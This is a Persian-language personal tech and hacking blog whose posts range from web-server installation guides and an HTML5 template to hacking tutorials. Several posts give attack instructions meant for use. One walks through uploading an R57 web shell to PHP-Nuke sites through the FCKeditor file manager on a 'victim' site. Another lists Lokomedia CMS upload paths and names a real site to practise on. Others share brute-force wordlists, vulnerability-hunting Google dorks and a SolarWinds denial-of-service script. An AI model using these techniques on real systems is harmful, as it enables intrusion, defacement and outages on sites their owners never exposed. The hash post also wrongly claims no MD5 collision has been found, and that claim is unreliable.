Encoder Official Weblog

وبلاگ شخصی سینا احمدی

نویسنده: سینا - سه شنبه دهم آبان 1390

مایکروسافت ... خیلی حال بهم زن ! خیلی مزخرف ! بدرد نخور ! کوتاه ترین تعریف که از مایکروسافت میشه کرد همینه ...

به نظر شما غیر از اینه ؟

مایکروسافت ! یه کمپانی غول اسباب بازی سازی که 70% کامپیوتر های دنیا رو تبدیل به اسباب بازی کرده . حالا شاید این سوال براتون پیش بیاد که چرا من انقدر عصبانی در موردش حرف می زنم .

همه ما می دونیم که برای استفاده از کامپیوتر از 3 لایه استفاده میکنیم .

Software -> OS -> HardWare

خوب ، سیستم عامل های مختلف دسترسی های مختلفی رو از لایه ها به ما میدن . برای مثال :

سیستم عامل های Linux,Solaris و ... به ما امکان تغییر OS رو هم دادن ! و یا دخالت در بخش هایی از سخت افزار و حتی مشاهده و تغییر در حافظه موقتی ( RAM) در شرایط خاص ...

اما مایکروسافت چی ؟

فقط یه ظاهر خیلی قشنگ ...

محیط Command زدن توی هر ورژن داره ساده تر و مختصر تر میشه . کلی از Command های Windows Server 2000 دیگه توی نسخه 2008 وجود نداره ...

یا اصلا یه مثال دیگه ...

میخوای یه Domain وصل کنی به سرور ...

توی لینوکس با چند تا کامند این کار رو انجام میدیم . اما توی OS های مایکروسافت ... 3000 تا Error رو باید جواب بدی تا بهش بگی آقا من مطمئنم که میخوام دامنه رو وصل کنم ...

خلاصه که اول LINUX بعد SOLARIS بغد هم MAC

نظر شما چیه ؟

آموزش نصب وب سرور Lighttpd

نویسنده: سینا - سه شنبه هفتم تیر 1390

آموزش نصب و کانفیگ کردن l‏ighttpd در lxadmin :

با سلام خدمت دوستان عزیزم این آموزش برای عزیزانی هست که خیلی علاقه مند به نصب lighttpd هستند :
ابتدا با دسترسی روت به سرور متصل بشید :
با کامند زیر ‏httpd را stop می کنیم .

root@rapidfa ~]# service httpd stop

“”“”“”“”ما در این آموزش فرض را بر این میزاریم که “ مای اس کیو ال “ نصب هست “”“”“”“”“

حالا میریم سراغ نصب و کانفیگ

root@rapidfa ~]# yum install lighttpd
root@rapidfa ~]# service lighttpd start

در این مرحله fastcgi را نصب می کنیم

root@rapidfa ~]# yum install lighttpd-fastcgi php-cli

حالا وقت آن رسیده که برید داخل php.ini و دنبال cgi.fix_pathinfo بگردید و آن را مساوی عدد 1 قرار دهید

به همین سادگی نصب به اتمام رسیده حالا وقت آن هست که به فلدر etc/lighttpd/ بروید و فایل اصلی lighttpd.conf را ابتدا از سایت زیر دانلود کنید و جای گذین فایل اصلی بکنید .

برای مشاهده ادامه آموزش به ادامه مطلب رجوع کنید ...

ادامه مطلب ...

نصب Nginx بر روی Kloxo

نویسنده: سینا - سه شنبه هفتم تیر 1390

پس از درخواست های بسیار دوستان تصمیم گرفتم نصب کردن Nginx بر روی Kloxo رو بهتون آموزش بدم .

ابتدا با ادسترسی ریشه به سرور متصل شوید .
حالا با استفاده از دستور زیر httpd را Stop می کنیم .

کد:

service httpd stop

حالا وقت نصب کردن فرا رسیده است . فایل را بر روی سرور دانلود کنید و سپس از حالت فشرده خارج کنید .

کد:

wget http://nginx.org/download/nginx-0.8.33.tar.gz

کد:

tar -zxf nginx-0.8.33.tar.gz

با دستور زیر وارد فلدر nginx شوید .

کد:

cd nginx-0.8.33

برای مشاهده ادامه آموزش به ادامه مطلب رجوع کنید ....

ادامه مطلب ...

آموزش کامل امنیت شبکه و نفوذ و روش های جلوگیری از آن

نویسنده: سینا - یکشنبه بیست و یکم فروردین 1390

آموزش کامل امنیت شبکه و نفوز و روش های جلوگیری از آن

شامل 3 CD به صورت کامل

امنیت شبکه و آموزش هک شبکه یکی از تخصصی ترین بحث های روز دنیا می باشد که همیشه از پر اهمیت ترین بحث های دنیای شبکه بوده است .
همیشه بهترین راه دفاع دانشتن روش های دفاع نیست بلکه گاهی اوقات ، بهترین مهاجمان می توانند بهترین مدافعان باشند چرا که به تمام راه های حمله آشنایند و و می توانند در مقابل هر یک از راه حل های خاص آن استفاده کنند . متخصصان IT نیز پس از تحقیقات فراوان متوجه این موضوع شدند که بهتر است مسسول امنیت شبکه خود از دید یک هکر به سایت ، شبکه ، برنامه کاربردی و PC ها نگاه کند .

در این ویدئو آموزشی شما با آموزش ایمن سازی سیستم های کاربران ( Client ها ),آموزش استفاده از برنامه های امنیت شبکه ,آموزش برنامه های ایمن سازی وب سایت ها ,آموزش روش های رمزنگاری داده ها ,آموزش تست نفوذ ( هک ) به شبکه سازمان و یا شرکت ,آموزش استفاده از ابزارهای کشف جرم های کامپیوتری چندین و چند مورد آموزشی دیگر آشنا خواهید شد. امیدواریم مورد پسند واقع شود .

این آموزش برای اولین بار در ایران به صورت کامل برای دانلود قرار داده شده است .

ادامه مطلب ، با تشکر از وطن دانلود

ادامه مطلب ...

Varnish Cache +plus cPanel == Warp Speed!

نویسنده: سینا - شنبه سیزدهم فروردین 1390

Varnish Cache plus cPanel == Warp Speed!

با سلامی دوباره ،

بنده به همراه شریکم (مدیریت دیتاسنتر رسادیتا) ، تصمیم به راه اندازی سرویس های جدید در دیتاسنتر گرفتیم ! با خریداری لایسنس از Varnish و تست آن به جای Litespeed و ... توانستیم با ارائه Config مناسب نتیجه خوبی بگیریم !

این پلاگین نسبت به Litespeed و Lighthttpd و همچنین Nginx و ... سرعت بیشتر و قدرت بهتری دارد ! طبق بررسی های انجام شده این پلاگین با کانفیگ Default از کیفیت مناسبی برخوردار نیست ! اما پس از Config شدن ، نتیجه خوبی نسبت به دیگر پلاگین ها دارد !

طبق آزمایش های دیتاسنتر ما با ارسال ترافیک بسیار بالا روی سرور و استفاده از منابع سرور و فشار آوردن روی Mysql و دانلود فایل توسط 40 IP مختلف Litespeed و Varnish از پس ترافیک سایت برآمدند اما دیگر پلاگین ها با مشکل مواجه شدند !

قابل ذکر است که این پلاگین با Cpanel قابل استفاده است

وب سایت : http://unixy.net/varnish/

موفق باشید

C++ Programming in Linux

نویسنده: سینا - چهارشنبه سوم فروردین 1390

C++ Programming in Linux

این هم یه عیدی دیگه به دوستان عزیزم ! به درخواست دوستان مقاله ای در زمینه برنامه نویسی ++C در محیط سیستم عامل لینوکس نوشتم ! این مقاله خیلی کوتاه هستش و سعی شده فقط مطالب ذکر بشه بدون حاشیه ! امیدوارم که استفاده کنید !

لینک دانلود مقاله

منتظر نظراتتون هستم

موفق و پیروز باشید

سینا /

CMS Lokomedia 1.5 Arbitary file upload vulnerability

نویسنده: سینا - چهارشنبه سوم فروردین 1390

با سلامی دوباره ، امشب براتون یکی از مشکلات امنیتی جالب و از نوع File Upload Vuln هستش رو مورد بررسی قرار میدم !
این باگ که به قولی تازه از تنور در اومده و هنوز خیلی از سایت ها دارن بسیار ساده استفاده میشه و میخوام برای تقویت بازدیدکنندگان وبلاگ هم که شده آموزش رو به صورت یک تمرین براتون در بیارم ! منتظر نتایج شما عزیزان از آموزش در نظرات هستم ...

اطلاعات باگ و نرم افزار :

Software: CMS Lokomedia

Vendor: http://bukulokomedia.com/home

Vuln Type: Arbitary file upload

Download link: http://bukulokomedia.com/lokomedia-1.5.rar

پیدا کردن Dork و ... هم به عهده خودتون میگذارم ! برای پیدا کردن Dork بهتره از دستور inurl استفاده کنید !

بخشی از سایت که مشکل پیدا داره و اجازه آپلود فایل رو به شما می ده :

http://host/path_to_lokomedia/tinymcpuk/filemanager/browser.html

و یا بخشی دیگر :

http://host/tinymcpuk/filemanager/browser.htmlو یا :
http://host//tinymcpuk/filemanager/frmupload.htmlیا :
http://host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html قابل استفاده برای شما عزیزان هستند !

بخش فایل های آپلود شده در دو مسیر زیر می باشد :

$fckphp_config['UserFilesPath'] = "./lokomedia/tinymcpuk/gambar" ;و یا این بخش :
$fckphp_config['UserFilesPath'] = "./tinymcpuk/gambar" ; */

نمونه زنده این تمرین : http://www.ikafela.com./tinymcpuk/filemanager/browser.htmlامیدوارم تمرین کنید و به تنیجه برسید

منبع : http://www.exploit-db.com/exploits/17014

موفق باشید

سینا /

اولین قالب HTML5 و CSS3 فارسی طراحی شد !

نویسنده: سینا - جمعه بیست و دوم مرداد 1389

سلامی دوباره به همه شما . مدت زیادی بود روی دو تکنولوژی جوان کار میکردم . منظورم HTML5 و CSS3 هست . این دو تکنولوژی به دلیل تازه وارد بودنشون کاربر زیادی ندارن و وب سایت های زیادی از این تکنولوژی ها استفاده نمی کنند . در صورتی که کل جهان میدونن این دو تکنولوژی در وب نقش مهمی را ایفا میکنند و نوعی انقلاب در زبان های برنامه نویسی تحت وب هستند . و اینک پس از تحقیقات و آموزش های داده شده توسط خودم در سایتهای مختلف تصمیم به طراحی و یا ترجمه قالب های HTML5 گرفتم . قالبی براتون آماده کردم که میتونید از اون در جاهای مختلف استفاده کنید .

این قالب به دو زبان فارسی و انگلیسی منتشر شده است .

ویژگی های قالب :

Full CSS

Use CSS3

HTML5 Coding

Design For Chrome,FireFox

آماده شده به دو زبان انگلیسی و فارسی

ضعف قالب :

عدم نمایش در Internet Explorer ! متاسفانه Internet Explorer ورژن کمتر از 8 قالب رو به صورت منظم نشون نمیده و دلیل اینه که CSS3 و HTML5 برای این نرم افزار تعریف نگردیده است ...

امیدوارم استقبال شه .

منتظر نظراتتون هستم .قالب به زودی از P30vel.ir پخش خواهد شد ...

دانلود نسخه انگلیسی : http://www.persiangig.com/pages/download/?dl=http://encoder.persiangig.com/html5/english.zip

دانلود نسخه فارسی : http://www.persiangig.com/pages/download/?dl=http://encoder.persiangig.com/html5/persian.zip

ارادتمند
سینا احمدی (ENCODER)

======================================
قابل توجه اون کسی که فحش داد : این قالب ترجمه است ! ;)

2 لیست پسورد

نویسنده: سینا - جمعه بیست و دوم مرداد 1389

امروز توی فایل های Brute Force خودم 2 تا پسورد لیست بین لیست ها جدا کردم که از بقیه بهتر بود . براتون آپلود کردم گفتم شاید به دردتون بخوره ...

یدونه لیست اعداده یدونه لیست کلمات ...

عالیه تقریبا ;)

لینک دانلود به صورت فشرده : http://encoder.persiangig.com/other/wordlists.zip

Php Nuke Blind Sql Injection 8.x.x Vulnerability

نویسنده: سینا - سه شنبه نوزدهم مرداد 1389

بازهم گزارش امنیتی از پی اچ پی نیوک توسط ایرانی ها ! خودتون مشاهده کنید . میتونید بزنید اگه دوست دارید :

http://inj3ct0r.com/exploits/13634

Black Jack C++ Soruce

نویسنده: سینا - دوشنبه هجدهم مرداد 1389

بازي Black Jack نوشته شده توسط Abdurahman Ravat

دانلود سورس : http://www.persiangig.com/pages/download/?dl=http://encoder.persiangig.com/blackjack.rar

عاشق پوکرم ! اینم سورس این بازی (C++)

Learn PHP In 24H

نویسنده: سینا - دوشنبه هجدهم مرداد 1389

مقاله آموزشی پی اچ پی در 24 ساعت !

زبان : فارسی

تعداد صفحات : 688

حجم : 24MB

دانلود : Link

آیا گوش دادن به موسیقی در حین درس خواندن مفید است؟

نویسنده: سینا - دوشنبه یازدهم مرداد 1389

آیا گوش دادن به موسیقی در حین درس خواندن مفید است؟

آیا گوش دادن به موسیقی در حین درس خواندن مفید است؟ جامعه - اگر شما در حال مطالعه برای یک امتحان هستید شاید گوش دادن به موسیقی ایده خوبی باشد. اما اگر شما سعی در به خاطر سپاری یک لیست، اعداد، حقایق و عناصر جدول تناوبی دارید، گوش دادن به موسیقی باعث بدتر شدن عملکرد شما می‌شود.

محققان دانشگاه والز قابلیت به یاد آوردن موارد مختلف را در حضور صداهای گوناگون بررسی کردند. آن‌ها از 25 نفر از داوطلبان که بین 18 تا 30 سال سن داشتند خواستند تا لیستی از حروف را به ترتیب به خاطر بسپارند و سپس آن را به یاد بیاورند.
این آزمایش در شرایط مختلف صدایی مانند محیط ساکت، محیطی که موسیقی‌های مورد علاقه فرد پخش می‌شد، موسیقی‌هایی که فرد به آن‌ها علاقه نداشت، صدایی که عدد 3 را مرتب تکرار می‌کرد و صدایی که به طور رندوم اعداد مختلف را بازگو می‌کرد انجام شد.
این تحقیقات نشان می‌دهد شرکت کننده‌ها زمانی که به موسیقی گوش می‌دهند ، چه به آن علاقه داشته باشند یا نداشته باشند و یا هنگامی که به صدایی که اعداد را به صورت تصادفی تکرار می‌کرد گوش می‌کنند بدترین عملکرد را دارند. اما در عین حال افرادی که این کار را در محیط ساکت انجام می‌دادند بهترین نتیجه را گرفتند.
محققان معتقدند قابلیت به خاطر سپاری در هنگام گوش دادن به موسیقی ضعیف‌تر می‌شود. چرا که در این هنگام تغییر مداوم صدا و کلمات باعث بدتر شدن عملکرد این قابلیت می‌شود.
در دهه 1990 ادعا شده بود گوش دادن به موسیقی موتزارت باعث افزایش قابلیت‌های سه بعدی و فضایی می‌شود، اما چند تحقیق دیگر که بعدها انجام شد این نتایج را به همراه نداشت. اما به هر حال محققان معتقدند زمانی که شما به آهنگی که دوست دارید گوش می‌دهید حال شما بهتر شده و تهییج می‌شوید که باعث بهبود کارایی شما می‌شود.
به همین دلیل دانشمندان معتقدند بهترین حالت برای گوش دادن به موسیقی قبل از شروع به مطالعه است و در هنگام درس خواندن بهتر است محیط کاملا ساکت باشد.

کتاب کامل آموزش Wireless Hacking

نویسنده: سینا - سه شنبه پنجم مرداد 1389

سلام دوستان
در این کتاب آموزش با اکثر متود های Wireless Hacking آشنا میشید.
کتاب کامل و بی عیب و نقصی به دوستان که میخوان Wireless Hacking کار کنن پیشنهاد میکنم.
تعداد صفحات : 52
نویسنده : حمید کاشفی

دانلود کتاب : http://rapidshare.com/files/408551320/wireless-attacks.rar

موفق باشید

سینا/

Bypass Frobbiden Error

نویسنده: سینا - سه شنبه پنجم مرداد 1389

باسلام

در این فیلم آموزشی شما دوستان رو با Bypass Forbbiden Error اشنا میشوید با توجه به حملات SQL Injection

و استفاده روزافزون ادمین ها از فایروالها و IDS در جلوگیری از این حملات با کمی تغییرات در ساختار کارکترها در جهت

bypaas کردن این ارور میتوانید به راحتی او را دور بزنید.

دانلود : http://rs731.rapidshare.com/files/409184174/Bypass_Forbbiden.rar

موفق باشید

سینا/

IP - پرتکل اینترنت

نویسنده: سینا - شنبه بیست و ششم تیر 1389

با توجه به اینکه بحث آی پی یا همان پروتکل اینترنت مبحث بسیار گسترده ، زیبا و خیلی مهم در همه زمینه های وب می باشد تصمیم گرفتم توضیح کوچکی درباره اون بدم تا شاید علاقه مند و پیگیر این مباحث بشوید !

یک راست و بی مقدمه سر اصل مطلب میریم --->

IP: Internet Protocol
شناسه هر کامپیوتر در شبکه IP آدرس نامیده میشود که یک عدد 32 بیتی یا 4 بایتی میباشد که بصورت 4 عدد ده دهی، 8 بیتی نوشته میشود و با نقطه dat از هم جدا میشوند.
xxx.xxx.xxx.xxx
به هر یک از اعداد 8 بیتی یک کواد گفته میشود.

IP Class:
کلاس A,B,C,D,E

IP Class----------------------------Quad-------------------------Subnet Mask
__________________________________________________ ____

A 8---------------------------------0-126-----------------------------255..0.0.0
B16------------------------------128-191-------------------------255.255.0.0
C24------------------------------192-223----------------------255.255.255.0
D----------------------------------224-239-----------------------not rejistered
E----------------------------------240-255-----------------------not rejistered

مثلا IP کلاینت ها از نوع کلاس C میباشد.

Port:
پورت دروازه ارسال یا دریافت اطلاعات میباشد. مثلا برنامه یاهو مسنجر بطور پیش فرض از پورت 5050 و سرویس دهنده وب یا همان پروتکل HTTP از پورت 80 استفاده میکند.
Open Port:
پورتی که سیستم عامل برای ارسال ودریافت اطلاعات به یک برنامه اختصاص میدهد.
Close Port:
پورتی است که هنوز به برنامه ای اختصاص نیافته ویا دسترسی به آن پورت توسط Firewall محدود شده. زمانی که شما یک درخواست برای یک پورت بسته ارسال میکنید، سیستم عامل پیغام خطای ICMP Destination Host Unreachable را برای شما فرستاده وبه درخواست شما خاتمه میدهد.
Stealth Port:
یا پورت مخفی، همان پورت بسته میباشد با این تفاوت که سیستم عامل هیچ گونه پیغام خطایی برای درخواست کننده نمی فرستد.

Bug:
عمدتا به نوعی خطا در دستورات یا منطق یک بر نامه گفته میشود که باعث میشود برنامه به درستی عمل نکرده و یا نتایج نادرست تولید کند. باگها ممکن است کم اهمیت و جزیی باشند و ممکن است بسیار مخرب باشند. (یکی از راههای نفوذ وجود باگ در سیستم می باشد.)
باگها قالبهای گوناگونی دارند مثلا قالب CAN,CVE ویا قالب Bug Traq,BID ویا قالب XF ویا قالب CA,CERT و...

Debug:
به یافتن محل خطا در منطق برنامه وتصحیح یا رفع اشکال آن گفته میشود.

برای فهمیدم بیشتر براتون مقاله ای آپلود کردم که میتونید از لینک زیر اون رو دریافت کنید :

http://rapidshare.com/files/407473601/IP.pdf

MD5: 4E66C8EA707F481F3BE1A20D69C64926

موفق و پیروز باشید
جینگولی /

قالب وبلاگتون رو خودتون بسازید !

نویسنده: سینا - جمعه بیست و پنجم تیر 1389

سایت ها و وبلاگ های زیادی قالب های وبلاگ رو در اختیار کاربران قرار می دهند اما مسلما بیشتر وبلاگنویسان دوست دارند قالب اختصاصی خودشون رو داشته باشند که اون هم نیازمند هزینه و یا وقت و انرژی زیادی هستش . سایت سایکو یک قالبساز انلاین و رایگان هستش که به شما این امکان رو می ده که به راحتی و بدون نیاز به اشنایی با کدهای html یک قالب اختصاصی و رایگان رو به صورت انلاین برای وبلاگتون بسازید . نکته جالب این سایت اینه که وقتی بعد از ساخت قالب دوباره وارد سایت بشید سایت از شما سوال می کنه که « ایا مایل به بارگذاری کار قبلی خود هستید ؟ » در نتیجه شما می تونید قالبی رو که قبلا توسط این سایت ساختید رو دوباره مشاهده و دریافت کنید .

قالب ساخته شده توسط سایت سایکو برای این وبلاگ

اموزش استفاده : کار با سایت بسیار سادست کافیه وارد سایت بشید و موارد خواسته شده در هر قسمت رو تکمیل کنید و یا تغییر بدهید و در پایان با کلیک بر روی دکمه « دریافت متن قالب » کلیک کنید و در پایان کد ساخته شده بوسیله سایت رو در قسمت ویرایش قالب در کنترل پنل وبلاگتون کپی کنید و تغییرات رو ذخیره نمایید .

لینک این مطلب رو از اینجا ببینید

CSS3 و HTML5 ! چرا از تکنولوژی عقب بمونیم ؟

نویسنده: سینا - جمعه بیست و پنجم تیر 1389

سلامی دوباره خدمت شما دوستان عزیز ! چند هفته ای است که در حال مطالعه بر روی نسخه های جدید دو عنصر اصلی طراحی وب هستم ! CSS و HTML ! نسخه های جدید این دو عنصر که نمیتونم اسمشون رو زبان برنامه نویسی بگذارم به تازگی منتشر شده است ...

اما مثل همیشه استفاده از اونها حالا حالا ها در ایران رواج پیدا نمیکنه چون تکنولوژی روز هست و ما ایرانیا عادت نداریم از تکنولوژی روز استفاده کنیم ! خوب ... حالا کسانی مثل من بیان دنبال این داستان و یاد بگیرن این 2 نسخه جدید رو ...

همه ایرانیا از اینترنت اکسپلورر 6 استفاده میکنن ! اینترنت اکسپلورر 6 وقتی اومد که خیلی ها هنوز از ویندوز 98 استفاده می کردند ! این خجالت آوره ! اما از این بحث ها بگذریم و کمی توضیح بدم درباره این دو عنصر .

برخلاف همه زبان ها که نسخه های جدیدشون تغییر زیادی نمیکنه این دو زبان تغییر زیادی کرند و واقعا قدرتمند شدند ! CSS3 زمانی فقط برای تعیین رنگ و سایز ها استفاده میشد ! اما در نسخه جدید میشه با اون یک ساعت و یا بسیاری از افکت ها رو کد نویسی کرد ! چرا نباید استفاده کنیم ؟

و یا HTML 5 ! به قدری پر سرعت و ساده شده که باور نکردنیه ! واقعا از ساختن یک سایت با CSS3 و HTML5 لذت می برم ! اما وقتی همه از اینترنت اکسپلورر 6 استفاده میکنند که دیگه کسی نمیتونه قدرت رو احساس کنه ! به زودی آموزش های بسیاری در رابطه با این دو زبان و نسخه های جدیدشون توی سایت آشیانه قرار خواهم داد !

این هم استایل های جدید CSS3 قرار داده و ادامه خواهم داد : http://www.ashiyane.org/forums/showthread.php?t=26801

موفق و پیروز باشید
سینا/

اسم و فامیل رپر ها !

نویسنده: سینا - شنبه دوازدهم تیر 1389

سلام به دوستان عزیز ! گفتم شاید اسم و فامیل رپر هایی که فقط اسم مستعار آنها را شنیدید براتون جالب باشه پس :

هیچکس = سروش لشکری
ساسی مانکن=ساسان حیدری
تهی =سید حسین موسوی
آرمین ۲afm = آرمین زارعی
یاس = یاسر بختیاری
پیشرو = رضا ناصری
استپس = حسام عزتی
نرگال=سینا جوادی
فلاکت =شاهین علیزاده
اسلیم = مهدی چاوشی
تتلو = امیر مقصودلو
هیتلر=کوروش یعقوبی
ساماویلی=سامان کرامتی
سیجل=سیاوش جلالی
قیامت= امیر حسین فرهنگ
پیت بوی = عماد رستمی.
بیداد = امیر قهرمانی
علی ساتراپ = علی اراکی
رضایا=امیر رضا طاری
حسین مخته=حسین مختاری
علیشمس= علی شمس.
آتیش=بهاره طالب لو

PHP NUKE REMOTE FILE UPLOAD BUG

نویسنده: سینا - یکشنبه ششم تیر 1389

سلام به همه اعضای عزیز و کسانی که از سیستم نیوک دفاع میکنن ...

خوب این هم از نیوک ! یه مدت کلی مشکل امنیتی سه کوئل اینجکشن و ... اومد بیرون . این هم یکی دیگه که داشت پابلیک میشد و گفتم که پابلیک کنم ...

تست شده روی نسخه 8.2

اما برای نفوذ !

ابتدا شل خود را آماده کنید ! به نظرم R57 باشه بهتره . پسوند فایل رو .php6 بگذارید ! هر فرمتی که میخواید . php6 به بالا ! 8 و 9 و 10 و 11 و ...

حالا فرقی نداره ...

خوب ، لینک زیر رو توی سایت باز کنید :

Yourvictim.com/includes/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

حالا شل خودتون رو آپلود کنید و از آدرس زیر اون رو اجرا کنید ...

yourvictim.com/images/uploads/File/yourshell.php6

خوب ، حالا این yourvictim منظور سایت مورد نظر شما و yourshell منظور اسم شل شما هست

تقریبا پرایویت هست و هنوز به سایت های اکسپلویت اطلاع داده نشده ...

موفق باشید

صلوات ....

البته نیوک با اصلاحیه که داد این رو پچ کرد ولی تازه داده ! 2 روز نشده فک کنم . من هم از اصلاحیه باگ رو گرفتم ...

اگه کپی میکنید منبع یادتون نره
یا حق

SQLi Dorks

نویسنده: سینا - یکشنبه ششم تیر 1389

سلامی دوباره به همه ! براتون یه سری گوگل درک آوردم ! برای اس کیو ال اینجکشن ! از طریق سرچ اینا تو گوگل متونید اس کیو ال اینجکشن ها رو جدا کنید

چند تا در اینجا ، چند صد تا در ادامه مطلب ... امیدوارم برای تازه وارد ها مفید باشه ...

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

بقیه در ادامه مطلب ...

ادامه مطلب ...

Solarwinds 10.4.0.13 Denial of Service

نویسنده: سینا - شنبه بیست و دوم خرداد 1389

بهتون درباره اسکریپت های خارج کردن دسترسی توضیحاتی داده بودم ! اما این اسکریپت داغه داغ برای خارج کردن سیستم های سولار وینز از دسترسی عموم و غیر عموم هستش ! Solarwinds DOS Script !

زبان اسکریپت : پایتون

دانلود از سرور پرشین گیگ

با تشکر

سینا/

مشکل امنیتی در قسمت typograf

نویسنده: سینا - یکشنبه شانزدهم خرداد 1389

این مشکل امنیتی در typograf ادیتور هست و باعث حملات Xss میشه . که در ادامه مطلب با این حملات آشنا میشین.
درجه خطر : کمورژنها : 7 تا 8.5

آشنایی با حملات XSS
XSS یک نوع حمله برای نفوذ هکرها به سایتها می باشد که در آن سایت مورد حمله قرار میگیرد اما هدف اصلی بازدید کنندگانی هستند که به آن سایت رجوع می کنند . و اطلاعات بازدید کنندگان بدون اینکه خودشان اطلاعی از آن داشته باشند دزدیده می شود . مثلا هکری سایت بانک ملت را مورد حمله XSS قرار می دهد با هک شدن این سایت به وسیله نفوذ گر در واقع او منتظر کاربرانی که وارد سایت می شوند می نشیند و به محض ورود آنها به سایت و وارد شدن به حساب بانکی خود هکر پسورد و یوزرنیم او را بدون اینکه خود او خبری داشته باشد می دزدد. به همین دلیل یکی از حمله های محبوب هکرها می باشد

دانلود پچ برای این باگ

ادامه مطلب ...

مقاله آموزشی ابزار های شبکه در لینوکس

نویسنده: سینا - یکشنبه شانزدهم خرداد 1389

مقاله دیگری براتون قرار میدم که مانند مقاله قبلی برای چند سال پیش هست اما هنوز هم کارآمد هستش . این مقاله در باره ابزار های شبکه در سیستم عامل لینوکس هستش . این مقاله که توسط مهدی چینی چی عزیز مدیر ارشد تیم امنیتی آشیانه نوشته شده است اکنون از طریق وبلاگ من قابل دریافت می باشد . امیدوارم استفاده کنید .

دانلود از سرور پرشین گیگ

با تشکر از مهدی ویرانگر

آموزش کامل FTP

نویسنده: سینا - یکشنبه شانزدهم خرداد 1389

مقاله ای که برای چند سال پیش هستش و توسط دوست عزیزم مهدی ویرانگر نوشته شده رو براتون قرار میدم . داشتم آرشیوم رو میگشتم دیدم مقاله بسیار خوبیه و حیفه براتون نگذارم . امیدوارم به دردتون بخوره و استفاده کنید !

دانلود از سرور پرشین گیگ

با تشکر

سینا/

درباره هش ها

نویسنده: سینا - شنبه پانزدهم خرداد 1389

سلام خدمت همه دوستان عزیزم .

در این پست قصد آموزش درباره هش ها رو دارم . ابتدا بهتره هش رو به شما معرفی کنم . دلیل ارسال این پست هم اینه که خیلی ها تماس گرفتن ، نظر دادن و ایمیل زدن و درباره هش ها پرسیدن . قبلا مقاله ای درباره هش ها نوشته بودم که از این لینک میتونید اون رو توی سایت آشیانه مشاهده کنید . همچنین به دلیل اینکه این مقاله 470 بار دانلود شد تصمیم گرفتم یک پست کامل تر نیز بدم تا اطلاعات شما رو کمی در این رابطه افزایش دهم . مبحث هش در هکینگ بسیار مهم هست .

اما کمی درباره هش ها :

هش چیست؟
هش (Hash, Hash Code, Digest, Message Digest هم نامیده می شود) را می توان به صورت اثر انگشت دیجیتالی یک داده در نظر گرفت. با این روش شما می توانید رشته ای اندازه-ثابت (fixed length) از یک داده به دست آورید که با روش های ریاضی به صورت "یک طرفه" رمزنگاری شده است. کشف رشته اصلی از رشته هش آن (عملیات معکو س به صورت کارا تقریبا غیر ممکن است. نکته دیگر اینکه هر داده یک رشته هش شده کاملا منحصر به فرد ایجاد می کند( احتمال یکی شدن رشته های هش دو رشته متفاوت در الگوریتم MD5 یک در 3.4028236692093846346337460743177e+38 می باشد.. این خواص ، هش کردن را به روشی کارا و ایده آل برای ذخیره سازی کلمات عبور در برنامه های شما تبدیل می کند. چرا؟ برای این که حتی اگر یک نفوذگر(Hacker) بتواند به سیستم و بانک اطلاعاتی شما نفوذ کند و بخشی از اطلاعات شما را به دست آورد (شامل کلمات عبور هش شده) نمی تواند کلمات عبور اولیه را از روی آن ها بازیابی کند.

یکی از دو خصوصیت الگوریتم های HASHاینه که معکو س پذیر نیستند! دومی اینه که هرگز دو ورودی متفاوت به خروجی یکسان منجر نمی شوند. هر یک از این دو خصوصیت اگر نقض بشه می گیم الگوریتم شکسته!!!

شناسایی اعضا با استفاده از Hash
تا کنون نشان داده ایم که بازیابی کلمه عبور اصلی از روی رشته هش تقریبا غیر ممکن است ، خب چگونه برنامه های ما تشخیص دهند که کلمه عبور وارد شده توسط کاربر صحیح است ؟ به سادگی ! با تولید رشته هش کلمه عبور وارد شده توسط کاربر و مقایسه آن با رشته هش ذخیره شده در رکورد بانک اطلاعاتی مربوط به کاربر می توانید متوجه شوید که آیا دو رشته با هم برابرند یا نه. بگذارید با ذکر یک مثال این بحث را ادامه دهیم.

Hashes are "digests", not "encryption"
Hash یک عمل خلاصه سازی (digest ) را روی جریان ورودی انجام می دهد نه یک عمل رمز نگاری (encryption) .
Encryption داده را از یک متن صریح (Clear text) به یک متن برمز در آورده تبدیل می کند (Cipher text). encryption ک عمل دو طرفه می باشد . که هرچه حجمClear text بیشتر باشد حجم Cipher text نیز بیشتر می شود.
که این ارتباط در شکل زیر به خوبی بیان شده است:

Encryption - a two-way operation

Hashe ها جریان داده ورودی را به یک خلاصه کوچک تبدیل می کنند. که این یک عمل یک طرفه(غیر قابل بازگشت) می باشد. و جریان داده ورودی آنها با هر حجمی که باشد خروجی یک مقدار ثابت میشود.
شکل بعدی این ارتباط را در خلاصه سازی توسط الگوریتم MD5 به خوبی نشان می دهد.

Hashing - a one-way operation

موارد استفاده از Hash ها
Hash ها کلا موارد استفاده کمی دارند که ما در ادامه بحث آن ها را بیان می کنیم:
1. تشخیص درستی یک فایل Verifying file integrity
برای مثال زمانی که یک فایل با حجم بالا را دانلود می نماییم می توانیم با به دست آوردن مقدار MD5 آن فایل توسط دستور md5sum و مقایسه آن با مقدار Md5 داده شده توسط سایت مورد نظر از درستی فایلمان اطمینان حاصل کنیم.
2. hash کردن کلمه عبور Hashing passwords
قبلا به طور مفصل بحث شد.

3. نشانه گذاری اسناد به روش digitally (امضاهای digitally)
که نحوه انجام ان به وضوح در شکل زیر نشان داده شده است:

Collision (تصادم) در Hash
زمانی که مقدار Hash دو ورودی متفاوت یکسان باشند می گوییم Collision رخ داده است.

اما تا کنون هیچ موردی از Collision دیده نشده است . این امر از این حقیقت ناشی می شود که تعداد مقادیر یک الگوریتم hash بسیار زیاد می باشند.برای مثال یک Hash 128 بیتی میتواند 3.4 x 1038
مقدار ممکن داشته باشد.که معادل 340,282,366,920,938,463,463,374,607,431,768,211,45 6 میباشد.

انواع هش
